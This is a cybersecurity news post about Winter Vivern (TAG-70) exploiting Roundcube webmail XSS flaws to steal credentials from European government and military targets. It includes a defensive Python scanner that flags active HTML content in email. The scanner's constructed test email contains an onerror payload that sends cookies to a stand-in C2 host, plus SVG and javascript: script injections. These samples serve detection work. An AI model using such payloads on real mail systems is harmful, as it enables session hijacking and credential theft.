Cybersecurity News

Roundcube vulnerability being exploited by Russian hackers 😢

Over 80 organisations have been targeted by a threat actor with ties to Belarus and Russia.

Threat actors with ties to Belarus and Russia have been implicated in a recent cyber espionage campaign, which exploited vulnerabilities in Roundcube webmail servers to target over 80 organisations. According to Recorded Future, these targeted entities are predominantly situated in Georgia, Poland, and Ukraine. The campaign has been attributed to a threat actor known as Winter Vivern, also identified as TA473 and UAC0114, tracked by Recorded Future under the name Threat Activity Group 70 (TAG-70).

Winter Vivern’s exploitation of security vulnerabilities in Roundcube and other software was previously highlighted by ESET in October 2023, and it aligns with the tactics of other Russia-linked threat actor groups such as APT28, APT29, and Sandworm, which commonly target email software.

Notably, Winter Vivern has been active since at least December 2020 and has previously exploited a patched vulnerability in Zimbra Collaboration email software to infiltrate organisations in Moldova and Tunisia in July 2023.

The cyber espionage campaign detected by Recorded Future ran from early October 2023 to mid-month, with the primary objective of gathering intelligence on European political and military activities. It follows earlier TAG-70 activity observed against Uzbekistan government mail servers in March 2023.

Recorded Future highlighted the sophistication of TAG-70’s attack methods, which combined social engineering with what was likely the exploitation of cross-site scripting (XSS) vulnerabilities in Roundcube webmail servers to gain unauthorised access to targeted mail servers, circumventing the defences of government and military organisations.

The attack chain exploits Roundcube vulnerabilities to run JavaScript payloads in the victim’s webmail session; those payloads are designed to exfiltrate user credentials to a command-and-control (C2) server.
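The core of this technique is an HTML email that carries active content (inline event handlers, script tags, embedded SVG or `javascript:` URLs) past the webmail sanitiser, so a useful first line of defence at the gateway or during incident triage is to flag such content before it reaches a mailbox. The script below is an added illustration of that check and is not Roundcube code, not tied to any specific Roundcube bug, and not the actor's payload; the two messages, the `c2.invalid` host and the payload strings are constructed for the example.

```python
"""Flag HTML e-mail parts that carry active content (script tags, inline event
handlers, javascript:/data: URLs, embedded SVG).  Added illustration for a
mail-gateway or IR triage check; not Roundcube code and not tied to any
particular CVE.  The sample messages below are constructed, not real captures."""
import re
from email import message_from_string
from html.parser import HTMLParser

# Attribute names that run script when the element renders (onload, onerror, ...).
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)
# Tags that can execute or load script if a sanitiser lets them through.
ACTIVE_TAGS = {"script", "svg", "iframe", "object", "embed", "meta", "link", "base"}
# URL schemes that execute code when followed or loaded.
SCRIPT_URL = re.compile(r"^\s*(javascript|vbscript|data):", re.I)
URL_ATTRS = {"href", "src", "xlink:href", "action"}


class ActiveContentFinder(HTMLParser):
    """Walk an HTML body and collect indicators; never executes anything."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; values are untouched.
        if tag in ACTIVE_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs:
            if EVENT_ATTR.match(name):
                self.findings.append(f"handler:{name}")
            elif name in URL_ATTRS and value and SCRIPT_URL.match(value):
                scheme = value.split(":", 1)[0].strip().lower()
                self.findings.append(f"url:{scheme}")


def html_parts(raw: str):
    """Yield decoded text/html bodies from a raw RFC 5322 message."""
    msg = message_from_string(raw)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            payload = part.get_payload(decode=True) or b""
            yield payload.decode(part.get_content_charset() or "utf-8", errors="replace")


def scan_message(raw: str) -> list:
    """Return a sorted, de-duplicated list of active-content indicators."""
    found = set()
    for body in html_parts(raw):
        finder = ActiveContentFinder()
        finder.feed(body)
        found.update(finder.findings)
    return sorted(found)


# Constructed sample: an ordinary HTML mail with a plain link.
BENIGN_MAIL = """From: press@example.org
To: analyst@example.net
Subject: Agenda
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Please find the <a href="https://example.org/agenda">agenda</a> here.</p></body></html>
"""

# Constructed sample: a lure whose HTML part smuggles script via SVG onload,
# an img onerror handler that posts cookies to a hypothetical C2, and a
# javascript: link.  c2.invalid is a reserved, non-routable name.
SUSPICIOUS_MAIL = """From: press@example.org
To: analyst@example.net
Subject: Press release
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Press release attached.
--b1
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Press release attached.</p>
<svg onload="alert(1)"></svg>
<img src="x" onerror="fetch('https://c2.invalid/?c='+encodeURIComponent(document.cookie))">
<a href="javascript:void(0)">open</a>
</body></html>
--b1--
"""

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN_MAIL), ("suspicious", SUSPICIOUS_MAIL)):
        print(label, scan_message(raw))
```

Run it on a raw message from the spool or an IMAP fetch; an empty list means no active content was found, while any `handler:`, `tag:` or `url:` indicator is worth quarantining or pulling into IR review. The parser approach is deliberately conservative (an `svg` tag is flagged even without a handler) because the point is to catch what a sanitiser might miss, not to judge intent.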

Moreover, Recorded Future identified instances of TAG-70 targeting Iranian embassies in Russia and the Netherlands, along with the Georgian Embassy in Sweden. This targeting suggests broader geopolitical interests in assessing Iran’s diplomatic activities, particularly its support for Russia in Ukraine. Similarly, the espionage against Georgian government entities indicates an interest in monitoring Georgia’s aspirations for European Union (EU) and NATO accession.



UK Cybersecurity Company

About Aitken Security

Aitken Security is a UK Cybersecurity Company specialising in offensive and defensive security.